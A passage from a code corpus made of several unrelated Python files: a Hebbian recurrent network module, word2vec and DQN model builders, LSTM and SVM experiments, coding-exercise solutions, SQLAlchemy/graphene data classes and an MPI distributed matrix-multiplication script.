self.weight_recurrent.matmul(y_partial)\n y = self.kwta(y)\n return y\n\n def extra_repr(self):\n return f\"in_features: {self.in_features}, \" \\\n f\"out_features: {self.out_features}, \" \\\n f\"recurrent_coef={self.recurrent_coef}\"\n\n\nclass AreaRNNHebb(AreaRNN):\n r\"\"\"\n A Hebbian-learning recurrent neural network with one or more incoming input\n layers and only one output layer.\n\n The update rule, if :math:`x_j` and :math:`y_i` neurons fired:\n\n * additive:\n\n .. math::\n W_{ij} = W_{ij} + \\beta\n :label: update-additive\n\n * multiplicative:\n\n .. math::\n W_{ij} = W_{ij} * (1 + \\beta)\n :label: update-multiplicative\n\n After each epoch, many repetitions of the same input trial, the weights\n are normalized to have ``1.0`` in its pre-synaptic sum for each neuron.\n\n Parameters\n ----------\n *in_features\n The sizes of input vectors from incoming areas.\n out_features : int\n The size of the output layer.\n p_synapse : float, optional\n The initial probability of recurrent and afferent synaptic\n connectivity.\n Default: 0.05\n recurrent_coef : float, optional\n The recurrent coefficient :math:`\\alpha` in :eq:`forward`.\n Default: 1\n learning_rate : float, optional\n The plasticity coefficient :math:`\\beta` in :eq:`update-additive` and\n :eq:`update-multiplicative`.\n Default: 0.1\n sampler : {sample_bernoulli, sample_uniform_masked}, optional\n Weights initialization function to call: either Bernoulli or uniform.\n Default: sample_bernoulli\n update : {'additive', 'multiplicative'}, optional\n The weight update learning rule.\n Default: 'multiplicative'\n\n Notes\n -----\n `'additive'` update learning rule allows new weights to grow, as opposed\n to `'multiplicative'`.\n\n \"\"\"\n def __init__(self, *in_features: int, out_features, p_synapse=0.05,\n recurrent_coef=1., learning_rate=0.1,\n sampler=sample_bernoulli, update='multiplicative'):\n super().__init__(*in_features, out_features=out_features,\n p_synapse=p_synapse, recurrent_coef=recurrent_coef,\n sampler=sampler)\n self.learning_rate = learning_rate\n if update == 'additive':\n self.update_weight = self.update_weight_additive\n elif update == 'multiplicative':\n self.update_weight = self.update_weight_multiplicative\n else:\n raise ValueError(f\"Invalid update rule: '{update}'\")\n\n def update_weight_additive(self, weight, x, y):\n # w_ij = w_ij + learning_rate, if x_j and y_i fired:\n # w_ij = w_ij + learning_rate * x_j * y_i\n weight.addr_(y, x, alpha=self.learning_rate)\n\n def update_weight_multiplicative(self, weight, x, y):\n # w_ij = w_ij * (1 + learning_rate), if x_j and y_i fired:\n # w_ij = w_ij * (1 + learning_rate * x_j * y_i)\n weight.mul_(1 + self.learning_rate * y.unsqueeze(1) * x.unsqueeze(0))\n\n def _normalize_weight(self, weight):\n presum = weight.sum(dim=1, keepdim=True)\n presum[presum == 0] = 1 # all elements in a row are zeros\n weight /= presum\n\n def extra_repr(self):\n update = self.update_weight.__name__.lstrip('update_weight_')\n return f\"{super().extra_repr()}, update='{update}'\"\n\n\nclass AreaRNNWillshaw(AreaRNN):\n r\"\"\"\n Non-Holographic Associative Memory Area [1]_: a recurrent neural network\n with one or more incoming input layers and only one output layer. The\n weights are sparse and binary.\n\n The update rule, if :math:`x_j` and :math:`y_i` neurons fired:\n\n .. math::\n W_{ij} = 1\n :label: update-will\n\n This update rule is the simplest possible update rule that requires\n neither the learning rate nor the weight normalization, compared to\n :class:`AreaRNNHebb`.\n\n Parameters\n ----------\n *in_features\n The sizes of input vectors from incoming areas.\n out_features : int\n The size of the output layer.\n p_synapse : float, optional\n The initial probability of recurrent and afferent synaptic\n connectivity.\n Default: 0.05\n recurrent_coef : float, optional\n The recurrent coefficient :math:`\\alpha` in :eq:`forward`.\n Default: 1.0\n\n References\n ----------\n .. [1] Willshaw, D. J., Buneman, O. P., & Longuet-Higgins, H. C. (1969).\n Non-holographic associative memory. Nature, 222(5197), 960-962.\n\n \"\"\"\n\n def __init__(self, *in_features: int, out_features, p_synapse=0.05,\n recurrent_coef=1, **ignored):\n super().__init__(*in_features,\n out_features=out_features,\n p_synapse=p_synapse,\n recurrent_coef=recurrent_coef,\n sampler=sample_bernoulli)\n\n def update_weight(self, weight, x, y):\n # w_ij = 1, if x_j and y_i fired, and 0 otherwise\n weight.addr_(y, x)\n weight.clamp_max_(1)\n\n def _normalize_weight(self, weight):\n # the weights are already binary at the update stage\n pass\n\n\nclass AreaStack(nn.Sequential, AreaInterface):\n \"\"\"\n Vertically stacked areas. The output activations will be linearly summed.\n\n Parameters\n ----------\n *areas\n Vertically stacked :class:`AreaRNN`.\n \"\"\"\n\n def __init__(self, *areas: AreaRNN):\n areas_named = OrderedDict({\n f\"{letter}\": area for letter, area in zip(ascii_uppercase, areas)\n })\n nn.Sequential.__init__(self, areas_named)\n\n def forward(self, xs_stim, y_latent=None):\n if xs_stim is None:\n xs_stim = [None] * len(self)\n assert len(xs_stim) == len(self)\n if y_latent is None:\n y_latent = [None] * len(xs_stim)\n y_out = [area(x, y_latent=yl) for area, x, yl in\n zip(self, xs_stim, y_latent)]\n return y_out\n\n\nclass AreaSequential(nn.Sequential, AreaInterface):\n \"\"\"\n A sequence of areas. The output of one area is fed into the next area.\n \"\"\"\n\n def forward(self, xs_stim, y_latent=None):\n if xs_stim is None:\n xs_stim = [None] * len(self)\n assert len(xs_stim) == len(self)\n y_out = xs_stim\n if y_latent is None:\n y_latent = [None] * len(self)\n y_intermediate = [] # hidden activations of the intermediate layers\n for module, yl in zip(self, y_latent):\n y_out = module(y_out, y_latent=yl)\n y_intermediate.append(y_out)\n return y_out, y_intermediate\n\n def recall(self, xs_stim):\n y_out, y_intermediate = super().recall(xs_stim)\n return y_out\n","sub_path":"assembly/areas.py","file_name":"areas.py","file_ext":"py","file_size_in_byte":13916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"582070992","text":"import gensim, logging\nimport sys\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\nf=open(sys.argv[1])\nline_s=[]\nfor line in f:\n\tline=line.strip().split()\n\tline_s.append(line)\nf.close()\nf=open(sys.argv[2])\nline_t=[]\nfor line in f:\n\tline=line.strip().split()\n\tline_t.append(line)\nf.close()\nmodel_s = gensim.models.Word2Vec(line_s,size=100, window=5, min_count=1, workers=4)\nmodel_t = gensim.models.Word2Vec(line_t,size=100, window=5, min_count=1, workers=4)\nmodel_s.save(sys.argv[1]+\".model\")\nmodel_t.save(sys.argv[2]+\".model\")\n\n","sub_path":"nn/exp1/ver5/train_vec_model.py","file_name":"train_vec_model.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"437737263","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : model.py\n# @Author: harry\n# @Date : 2/4/21 6:47 PM\n# @Desc : DQN model\n# Ref: https://medium.com/analytics-vidhya/building-a-powerful-dqn-in-tensorflow-2-0-explanation-tutorial-d48ea8f3177a\n\nimport tensorflow as tf\nfrom tensorflow.keras.initializers import VarianceScaling\nfrom tensorflow.keras.layers import (Add, Conv2D, Dense, Flatten, Input,\n Lambda, Subtract)\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.optimizers import Adam, RMSprop\nfrom constants import RESIZED_HEIGHT, RESIZED_WIDTH, NUM_ACTIONS\n\n\ndef build_q_network(\n n_actions, learning_rate=0.00001,\n input_shape=(RESIZED_HEIGHT, RESIZED_WIDTH),\n history_length=4\n):\n \"\"\"Builds a dueling DQN as a Keras model\n Arguments:\n n_actions: Number of possible action the agent can take\n learning_rate: Learning rate\n input_shape: Shape of the preprocessed frame the model sees\n history_length: Number of historical frames the agent can see\n Returns:\n A compiled Keras model\n \"\"\"\n model_input = Input(shape=(input_shape[0], input_shape[1], history_length))\n x = Lambda(lambda layer: layer / 255)(model_input) # normalize by 255\n\n # x = Conv2D(8, (6, 6), strides=4, kernel_initializer=VarianceScaling(scale=2.),\n # activation='relu', use_bias=False)(x)\n # x = Conv2D(8, (3, 3), strides=2, kernel_initializer=VarianceScaling(scale=2.),\n # activation='relu', use_bias=False)(x)\n x = Conv2D(8, (6, 6), strides=4, kernel_initializer=VarianceScaling(scale=2.),\n activation='relu', use_bias=False)(x)\n x = Conv2D(16, (4, 4), strides=2, kernel_initializer=VarianceScaling(scale=2.),\n activation='relu', use_bias=False)(x)\n x = Conv2D(16, (3, 3), strides=1, kernel_initializer=VarianceScaling(scale=2.),\n activation='relu', use_bias=False)(x)\n x = Conv2D(32, (3, 3), strides=1, kernel_initializer=VarianceScaling(scale=2.),\n activation='relu', use_bias=False)(x)\n\n # Split into value and advantage streams\n val_stream, adv_stream = Lambda(lambda w: tf.split(w, 2, 3))(x) # custom splitting layer\n\n val_stream = Flatten()(val_stream)\n val = Dense(1, kernel_initializer=VarianceScaling(scale=2.))(val_stream)\n\n adv_stream = Flatten()(adv_stream)\n adv = Dense(n_actions, kernel_initializer=VarianceScaling(scale=2.))(adv_stream)\n\n # Combine streams into Q-Values\n reduce_mean = Lambda(lambda w: tf.reduce_mean(w, axis=1, keepdims=True)) # custom layer for reduce mean\n q_vals = Add()([val, Subtract()([adv, reduce_mean(adv)])])\n\n # Build model\n model = Model(model_input, q_vals)\n model.compile(Adam(learning_rate), loss=tf.keras.losses.Huber())\n\n return model\n\n\ndef test_model():\n m = build_q_network(NUM_ACTIONS)\n m.summary()\n\n\nif __name__ == '__main__':\n test_model()\n","sub_path":"dqn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"352163457","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 18 10:04:56 2016\n\n@author: lmcfadden\n\"\"\"\n\n\"\"\"\nIndexError - Trying to access beyond lists limits.\n test = [1, 7,4]\n test[4]\n\nTypeError - Trying to convert an inappropriate type.\n int(test)\n\nNameError - Referencing a non-existent variable.\n a\nTypeError - Mixing data types without coercion.\n 'a'/4\n\n\nSyntaxError: Python can't parse program\nNameError: local or global name not found\nAttributeError: attribute reference fails\nTypeError: operand doesn't have correct type\nValueError: operand type ok, but value is illegal\nIOError: IO system reports malfunction (e.g. file not found)\n\"\"\"\n\nans = ''\nwhile ans != 'e':\n try:\n a = int(input(\"Tell me a number: \"))\n b = int(input(\"Tell me another number: \"))\n #print (\"a/b = \", a/b)\n #print (\"a+b = \", a+b)\n #ans = 'e'\n except ValueError:\n print (\"Could not convert to a number.\")\n except ZeroDivisionError:\n print (\"Can't divide by zero\")\n except:\n print (\"Something went very wrong.\")\n \n \n #print (\"Outside\")","sub_path":"Python_2016/exception_testing.py","file_name":"exception_testing.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"62186331","text":"class Solution(object):\n def reverse(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n res = 0\n abs_x = abs(x)\n flag = 1 if x == 0 else x/abs_x\n while abs_x:\n res = res * 10 + (abs_x % 10)\n abs_x /= 10\n print(res, abs_x, x)\n res *= flag\n return 0 if res > pow(2, 31)-1 or res < -pow(2, 31) else res\n \n\n# faster version\n","sub_path":"python3/7_Reverse_Integer.py","file_name":"7_Reverse_Integer.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"547901334","text":"# Problem from Hackerearth\n# https://www.hackerearth.com/fr/practice/data-structures/trees/binary-search-tree/practice-problems/algorithm/monk-and-his-friends/description/\n\n\ndef check_exist(_in, _out):\n inside_class = set(_in)\n for stu in _out:\n if stu in inside_class:\n print('YES')\n else:\n print('NO')\n inside_class.add(stu)\n\n\ndef solution():\n T = int(input())\n for i in range(T):\n N, M = map(int, input().strip().split())\n A = list(map(int, input().strip().split()))\n inside_class = A[:N]\n outside_class = A[N:]\n check_exist(inside_class, outside_class)\n\n\nsolution()\n","sub_path":"Blue/Session 14 - Binary Search Tree/Hackerearth_monk-and-his-friends.py","file_name":"Hackerearth_monk-and-his-friends.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"97518150","text":"import datetime\nfrom ulapd_api.extensions import db\n\n\nclass Dataset(db.Model):\n __tablename__ = 'dataset'\n dataset_id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String, unique=True, nullable=False)\n title = db.Column(db.String, nullable=False)\n version = db.Column(db.String)\n url = db.Column(db.String)\n description = db.Column(db.String)\n licence_name = db.Column(db.String)\n state = db.Column(db.String, default='active')\n type = db.Column(db.String, default='dataset')\n private = db.Column(db.Boolean, default=False)\n external = db.Column(db.Boolean, default=False)\n metadata_created = db.Column(db.DateTime(timezone=False), default=datetime.datetime.utcnow)\n\n def __init__(self, dataset_data):\n self.name = dataset_data['name']\n self.title = dataset_data['title']\n self.version = dataset_data['version']\n self.url = dataset_data['url']\n self.description = dataset_data['description']\n self.licence_name = dataset_data['licence_id']\n self.state = dataset_data['state']\n self.type = dataset_data['type']\n self.private = dataset_data['private']\n self.external = dataset_data['external']\n\n @staticmethod\n def get_all(external=False):\n return Dataset.query.filter_by(external=external).all()\n\n @staticmethod\n def get_dataset_by_id(dataset_id):\n return Dataset.query.filter_by(dataset_id=dataset_id).first()\n\n @staticmethod\n def get_dataset_by_name(name):\n return Dataset.query.filter_by(name=name).first()\n\n @staticmethod\n def get_dataset_by_licence_name(licence_name):\n return Dataset.query.filter_by(licence_name=licence_name).first()\n\n def as_dict(self):\n return {\n 'dataset_id': self.dataset_id,\n 'name': self.name,\n 'title': self.title,\n 'version': self.version,\n 'url': self.url,\n 'description': self.description,\n 'licence_id': self.licence_name,\n 'state': self.state,\n 'type': self.type,\n 'private': self.private,\n 'metadata_created': self.metadata_created,\n 'external': self.external\n }\n","sub_path":"ulapd_api/models/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"482930394","text":"def multiply_strings(string1, string2, n):\r\n s = 0\r\n for i in range(n):\r\n s += ord(string1[i]) * ord(string2[i])\r\n return s\r\n\r\n\r\ndef sum_remain(string, n):\r\n s = 0\r\n for i in range(1, n + 1):\r\n s += ord(string[len(string) - i])\r\n return s\r\n\r\n\r\nstrings = input().split(' ')\r\nstr1 = strings[0]\r\nstr2 = strings[1]\r\n\r\nsuma = 0\r\nif len(str1) > len(str2):\r\n shorter = len(str2)\r\n remain = len(str1) - len(str2)\r\n suma = multiply_strings(str1, str2, shorter) + sum_remain(str1, remain)\r\nelif len(str2) > len(str1):\r\n shorter = len(str1)\r\n remain = len(str2) - len(str1)\r\n suma = multiply_strings(str1, str2, shorter) + sum_remain(str2, remain)\r\nelse:\r\n number = len(str1)\r\n suma = multiply_strings(str1, str2, number)\r\n\r\nprint(suma)\r\n\r\n\r\n\r\n\r\n","sub_path":"PyCharm_projects_2020/Fundamentals/text_processing/character_multiplier.py","file_name":"character_multiplier.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"486984316","text":"import time\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom torch.autograd import Variable\nimport bcolz\n\nuse_cuda = 1\n\nclass RNNModel(nn.Module):\n def __init__(self, ntoken=20000, ninp=128, nhid=128, nlayers=7):\n super(RNNModel, self).__init__()\n self.ninp = ninp\n self.nhid = nhid\n self.nlayers = nlayers\n\n self.encoder = nn.Embedding(ntoken, ninp)\n self.rnn = nn.LSTM(input_size=ninp, hidden_size=nhid, num_layers=nlayers, dropout=0.2)\n #self.gru = nn.GRU(input_size=nhid, hidden_size=64, dropout=0.2)\n #self.gru = nn.LSTM(nhid, 64, dropout=0.2)\n self.dense = nn.Linear(nhid, 1)\n self.sm = nn.Sigmoid()\n self.init_weights()\n\n def init_weights(self):\n initrange = 0.1\n self.encoder.weight.data.uniform_(-initrange, initrange)\n self.dense.bias.data.fill_(0)\n self.dense.weight.data.uniform_(-initrange, initrange)\n\n def init_hidden(self, bsz):\n if use_cuda:\n return (Variable(torch.zeros(self.nlayers, bsz, self.nhid).cuda()),\n Variable(torch.zeros(self.nlayers, bsz, self.nhid).cuda()))\n else:\n return (Variable(torch.zeros(self.nlayers, bsz, self.nhid)),\n Variable(torch.zeros(self.nlayers, bsz, self.nhid)))\n\n def forward(self, sentence, hidden):\n embeds = self.encoder(sentence)\n lstm_out, hidden = self.rnn(embeds, hidden)\n # return the last element\n lstm_out = lstm_out[-1]\n decoded = self.dense(lstm_out)\n output = self.sm(decoded).view(-1)\n\n return output, hidden\n\n\ndef get_batch(x, y, i, batch_size, evaluation=False):\n d = torch.from_numpy(x[i:i+batch_size].transpose()).long()\n t = torch.from_numpy(y[i:i+batch_size].transpose()).float().view(-1)\n if use_cuda:\n d = d.cuda()\n t = t.cuda()\n data = Variable(d, volatile=evaluation)\n target = Variable(t)\n\n return data, target\n\n\ndef train(model, criterion, x_train, y_train, x_test, y_test, epoch, lr):\n model.train()\n total_loss = 0\n start_time = time.time()\n\n batch_size = 128\n reporting_size = batch_size\n\n optimizer = optim.Adam(model.parameters(), lr=1e-4)\n \n for batch, i in enumerate(range(0, int(len(x_train)/batch_size * batch_size) -batch_size, batch_size)):\n data, targets = get_batch(x_train, y_train, i, batch_size)\n hidden = model.init_hidden(batch_size)\n optimizer.zero_grad()\n\n output, hidden = model(data, hidden)\n loss = criterion(output, targets)\n loss.backward()\n optimizer.step()\n\n total_loss += loss.data\n\n if batch % reporting_size == 0 and batch > 0:\n cur_loss = total_loss[0] / reporting_size\n elapsed = time.time() - start_time\n print('| epoch {:3d} | {:5d}/{:5d} batches | lr {:02.2f} | ms/batch {:5.2f} | '\n 'loss {:5.4f} | ppl {:8.2f}'.format(\n epoch, batch, 25000// 32, lr,\n elapsed * 1000 / reporting_size,cur_loss, math.exp(cur_loss)))\n start_time = time.time()\n\n total_loss = 0\n\n\ndef main():\n max_features = 20000\n\n print('Loading data')\n x_train = bcolz.open(rootdir=\"x_train\")\n y_train = bcolz.open(rootdir=\"y_train\")\n x_test = bcolz.open(rootdir=\"x_test\")\n y_test = bcolz.open(rootdir=\"y_test\")\n print(len(x_train), 'train sequences')\n print(len(x_test), 'test sequences')\n\n print('Pad sequences (samples x time)')\n print('x_train shape:', x_train.shape)\n print('x_test shape:', x_test.shape)\n\n\n model = RNNModel()\n if use_cuda:\n model = model.cuda()\n criterion = nn.BCELoss()\n lr = 0.1\n for epoch in range(15):\n train(model, criterion, x_train, y_train, x_test, y_test, epoch, lr)\n\nif __name__ == \"__main__\":\n main()\n\n#r = RNNModel() \n# https://github.com/pytorch/examples/blob/master/word_language_model/model.py\n","sub_path":"lstm/imdb.py","file_name":"imdb.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"501863473","text":"from functools import partial\n\nfrom sqlalchemy.orm.query import Query\n\nfrom graphene.relay import ConnectionField\nfrom graphene.relay.connection import PageInfo\nfrom graphql_relay.connection.arrayconnection import connection_from_list_slice\n\nfrom .utils import get_query, sort_argument_for_model\n\n\nclass _UnsortedSQLAlchemyConnectionField(ConnectionField):\n\n @property\n def model(self):\n return self.type._meta.node._meta.model\n\n @classmethod\n def get_query(cls, model, info, sort=None, **args):\n query = get_query(model, info.context)\n if sort is not None:\n if isinstance(sort, str):\n query = query.order_by(sort.order)\n else:\n query = query.order_by(*(value.order for value in sort))\n return query\n\n @property\n def type(self):\n from .types import SQLAlchemyObjectType\n _type = super(ConnectionField, self).type\n assert issubclass(_type, SQLAlchemyObjectType), (\n \"SQLAlchemyConnectionField only accepts SQLAlchemyObjectType types\"\n )\n assert _type._meta.connection, \"The type {} doesn't have a connection\".format(_type.__name__)\n return _type._meta.connection\n\n @classmethod\n def connection_resolver(cls, resolver, connection, model, root, info, **args):\n iterable = resolver(root, info, **args)\n if iterable is None:\n iterable = cls.get_query(model, info, **args)\n if isinstance(iterable, Query):\n _len = iterable.count()\n else:\n _len = len(iterable)\n connection = connection_from_list_slice(\n iterable,\n args,\n slice_start=0,\n list_length=_len,\n list_slice_length=_len,\n connection_type=connection,\n pageinfo_type=PageInfo,\n edge_type=connection.Edge,\n )\n connection.iterable = iterable\n connection.length = _len\n return connection\n\n def get_resolver(self, parent_resolver):\n return partial(self.connection_resolver, parent_resolver, self.type, self.model)\n\n\nclass SQLAlchemyConnectionField(_UnsortedSQLAlchemyConnectionField):\n\n def __init__(self, type, *args, **kwargs):\n if 'sort' not in kwargs:\n kwargs.setdefault('sort', sort_argument_for_model(type._meta.model))\n elif kwargs['sort'] is None:\n del kwargs['sort']\n super(SQLAlchemyConnectionField, self).__init__(type, *args, **kwargs)\n\n\n__connectionFactory = _UnsortedSQLAlchemyConnectionField\n\n\ndef createConnectionField(_type):\n return __connectionFactory(_type)\n\n\ndef registerConnectionFieldFactory(factoryMethod):\n global __connectionFactory\n __connectionFactory = factoryMethod\n\n\ndef unregisterConnectionFieldFactory():\n global __connectionFactory\n __connectionFactory = _UnsortedSQLAlchemyConnectionField\n","sub_path":"graphene_sqlalchemy/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"39991259","text":"import random\n\nimport pandas as pd\nimport numpy as np\nfrom libsvm.commonutil import svm_read_problem\nfrom libsvm.svmutil import *\nfrom libsvm.svm import *\n\n\ndef initData():\n with open('data.txt', 'r', encoding='utf-8') as f:\n lines = f.readlines()\n lines1 = lines[:8]\n lines2 = lines[8:]\n random.shuffle(lines1)\n random.shuffle(lines2)\n mid1 = int(len(lines1) / 2)\n mid2 = int(len(lines2) / 2)\n with open('train.txt', 'w') as f:\n f.writelines(lines1[:mid1])\n f.writelines(lines2[:mid2])\n with open('test.txt', 'w') as f:\n f.writelines(lines1[mid1:])\n f.writelines(lines2[mid2:])\n\n\nif __name__ == '__main__':\n initData()\n yt, xt = svm_read_problem('test.txt')\n y, x = svm_read_problem('train.txt')\n linear = svm_train(y, x, '-t 0')\n rbf = svm_train(y, x, '-t 2')\n svm_save_model('linear_model', linear)\n svm_save_model('rbf_model',rbf)\n p1_label, p1_acc, p1_val = svm_predict(yt, xt, linear)\n p1_label, p1_acc, p1_val = svm_predict(yt, xt, rbf)\n","sub_path":"ML/homework2/svm1.py","file_name":"svm1.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"544864208","text":"import json\n\n\nclass Configuration:\n def __init__(self, config_path):\n with open(config_path, 'r') as f:\n config = json.load(f)\n\n # Environment\n self.env_name = config['environment']['env_name']\n self.env_config = config['environment']['config_dir']\n self.map_file = self.env_config + config['environment']['map_file']\n self.setup_file = self.env_config + config['environment']['setup_file']\n self.unit_file = self.env_config + config['environment']['unit_file']\n self.env_output_dir = config['environment']['env_output_dir']\n self.debug = 0\n\n # Exploration\n self.epsilon_start = config['exploration']['epsilon_start']\n self.epsilon_final = config['exploration']['epsilon_final']\n self.epsilon_decay = config['exploration']['epsilon_decay']\n\n # Training\n self.target_update_freq = config['training']['target_update_freq']\n\n self.start_learning = config['training']['start_learning']\n self.lr = config['training']['learning_rate']\n self.max_steps = config['training']['max_steps']\n self.max_episodes = config['training']['max_episodes']\n\n # Memory replay\n self.capacity = config['memory_replay']['capacity']\n self.batch_size = config['memory_replay']['batch_size']\n\n # Output\n self.save_update_freq = config['output']['save_update_freq']\n self.output_dir = config['output']['directory']\n self.dpi = config['output']['dpi']\n\n # Model\n self.td_target = config['model']['temporal_difference_target']\n assert self.td_target in (\"mean\", \"max\", \"individual\")\n self.gamma = config['model']['gamma']\n self.hidden_dim = config['model']['hidden_dim']\n self.exploration_method = config['model']['exploration']\n\n # Device\n self.device = config['device']\n","sub_path":"agents/DQN_SelfPlay/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"582261608","text":"import numpy as np\nfrom mpi4py import MPI\nimport time\nimport random\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nstatus = MPI.Status()\nsize = 3000\nnumberOfworkers = 20\nnumberOfComp = 3\nnumberOfIter = 1000\nnumberOfGroups = 4\ngroupSize = int(numberOfworkers / numberOfGroups)\ncompVector = [2, 3]\nrequiredCompIndex = groupSize - compVector[0] + 1\npm = 0\nminiComp = 10\nX = np.random.rand(int(size / miniComp), size) * np.sqrt(1)\ncounter = 0\niterIndex = 1\nlastTagCounter = 0\np = 0.4\ntsleep = 0.024\nrecvCounter = 0\nprevRecv = 0\n\n\ndef groupIndex(rank, groupSize, indexId):\n groupTag = (rank - 1) / groupSize\n groupRank = (((rank - 1) % groupSize)) + 1\n groupPlacement = ((groupRank + indexId) % groupSize + 1) + ((groupRank + indexId) / (groupSize + 1))\n a = [groupTag, groupPlacement]\n return a\n\n\ndef sendCheck(req):\n if req is None:\n return True\n else:\n return MPI.Request.Test(req)\n\n\nif rank == pm:\n ts = time.time()\n message = np.zeros(1)\n while iterIndex <= numberOfIter + 1:\n Y = np.empty([size, 1])\n recvVector = np.zeros([numberOfGroups, groupSize])\n if iterIndex == numberOfIter + 1:\n tf = time.time()\n print(tf - ts)\n while (lastTagCounter < numberOfworkers):\n comm.Recv(Y, source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)\n if status.Get_tag() == iterIndex:\n lastTagCounter += 1\n iterIndex += 1\n else:\n while (sum(requiredCompIndex <= np.sum(recvVector, axis=1)).astype(int)) < numberOfGroups:\n comm.Recv(Y, source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)\n if status.Get_tag() == iterIndex:\n a = groupIndex(status.Get_source(), groupSize, int(Y[0][0]))\n recvVector[a[0]][a[1] - 1] = 1\n recvCounter += 1\n else:\n prevRecv += 1\n iterIndex += 1\n message[0] = iterIndex\n if iterIndex % 2 == 1:\n for k in range(1, numberOfworkers + 1):\n comm.Send(message, dest=k)\n else:\n for k in range(numberOfworkers, 0, -1):\n comm.Send(message, dest=k)\n print('Recv on iter ', recvCounter, ' Prev iter Recvs ', prevRecv)\n\n\nelse:\n message = np.zeros(1)\n sleepFlag = 1\n Y = np.zeros([size, 1])\n indexId = 0\n multCounter = 0\n sent = 0\n buffer = 0\n req = comm.Irecv(message, source=pm)\n req2 = None\n while iterIndex <= numberOfIter + 1:\n if iterIndex == numberOfIter + 1:\n comm.Send(Y, dest=pm, tag=iterIndex)\n iterIndex += 1\n else:\n if sleepFlag != 1:\n if random.uniform(0, 1) < p:\n time.sleep(tsleep)\n sleepFlag = 1\n if MPI.Request.Test(\n req) and sleepFlag and iterIndex <= numberOfIter: # check right away and after message sent.\n iterIndex += 1\n counter = 0\n indexId = 0\n sleepFlag = 0\n buffer = 0\n multCounter = 0\n if iterIndex <= numberOfIter:\n req = comm.Irecv(message, source=pm)\n # print(\"message changed while waiting\")\n if counter < numberOfComp and iterIndex <= numberOfIter and sleepFlag: # comp block\n tet = np.random.rand(size, 1)\n miniMult = np.matmul(X, tet) # (300,3000)x(3000,1)=(300,1) miniMatrix\n startPoint = int((multCounter % miniComp) * int((size / miniComp))) # i.e: multCounter=15 ==> 1500\n endPoint = int((multCounter % miniComp + 1) * int((size / miniComp))) # multCounter=15 ==> 1800\n Y[startPoint:endPoint] = miniMult # change the Y values between (1500-1800,1) with minimult(300,1)\n multCounter += 1\n if multCounter >= miniComp and multCounter % miniComp == 0:\n counter += 1\n if counter in compVector:\n buffer += 1\n if MPI.Request.Test(req) and sleepFlag and iterIndex <= numberOfIter: # check after comp\n iterIndex += 1\n counter = 0\n indexId = 0\n sleepFlag = 0\n buffer = 0\n multCounter = 0\n if iterIndex <= numberOfIter:\n req = comm.Irecv(message, source=pm)\n # print(\"message changed in comp\")\n if sleepFlag and buffer != 0 and sendCheck(req2) and iterIndex <= numberOfIter:\n Y[0][0] = indexId\n indexId += 1\n req2 = comm.Issend(Y, dest=pm, tag=iterIndex)\n if iterIndex == 1:\n req2.wait()\n buffer -= 1\n sent += 1\nMPI.Finalize()\n","sub_path":"GC_MM_C_ALT.py","file_name":"GC_MM_C_ALT.py","file_ext":"py","file_size_in_byte":4917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"310145037","text":"import os\nimport json\nimport time\nimport torch\nimport argparse\nimport numpy as np\nfrom multiprocessing import cpu_count\nfrom torch.utils.data import DataLoader\nfrom collections import OrderedDict, defaultdict\nimport pickle\nfrom tensorboardX import SummaryWriter\nfrom convlab2.policy.mle.idea5.utils import expierment_name\n\nimport os\nimport json\nimport time\nimport torch\nimport argparse\nimport numpy as np\nfrom multiprocessing import cpu_count\nfrom torch.utils.data import DataLoader\nfrom collections import OrderedDict, defaultdict\nimport pickle\nfrom tensorboardX import SummaryWriter\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n# define the loss function, model_dialogue could also use that.\npos_weights = torch.full([549], 2, dtype=torch.float).to(device)\nreconstruction_loss = torch.nn.BCEWithLogitsLoss(reduction=\"sum\", pos_weight=pos_weights)\nclassification_loss = torch.nn.BCEWithLogitsLoss(reduction=\"sum\")\n\ndef loss_fn(logp, target, disc_res, disc_tar):\n loss1 = reconstruction_loss(logp, target)\n loss2 = classification_loss(disc_res, disc_tar)\n return loss1, loss2\n\n\ndef main(args):\n\n ts = time.strftime('%Y-%b-%d-%H:%M:%S', 